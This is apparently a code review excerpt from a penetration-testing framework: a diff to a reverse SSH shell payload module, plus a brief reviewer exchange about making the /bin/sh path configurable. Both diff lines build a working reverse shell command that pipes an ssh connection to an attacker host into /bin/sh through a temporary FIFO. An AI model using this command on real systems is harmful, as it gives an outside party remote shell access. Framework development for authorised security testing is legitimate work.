modules/payloads/singles/cmd/unix/reverse_ssh.rb

```diff
@@ -54,6 +55,6 @@ def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4..8)
     lport = datastore['LPORT'] == 22 ? '' : "-p #{datastore['LPORT']} "
     opts =  datastore['SshClientOptions'].blank? ? '' : datastore['SshClientOptions'].split(' ').compact.map {|e| e = "-o #{e} " }.join
-    "mkfifo /tmp/#{backpipe};ssh -qq #{opts}#{datastore['LHOST']} #{lport}0</tmp/#{backpipe}|/bin/sh >/tmp/#{backpipe} 2>&1;rm /tmp/#{backpipe}"
+    "mkfifo /tmp/#{backpipe};#{datastore['SSHPath']} -qq #{opts}#{datastore['LHOST']} #{lport}0</tmp/#{backpipe}|/bin/sh >/tmp/#{backpipe} 2>&1;rm /tmp/#{backpipe}"
```

Comment:
Hardcoded path to `/bin/sh` here could be updated to take from a datastore option instead?

Reply:
This option for all modules with `/bin/sh`?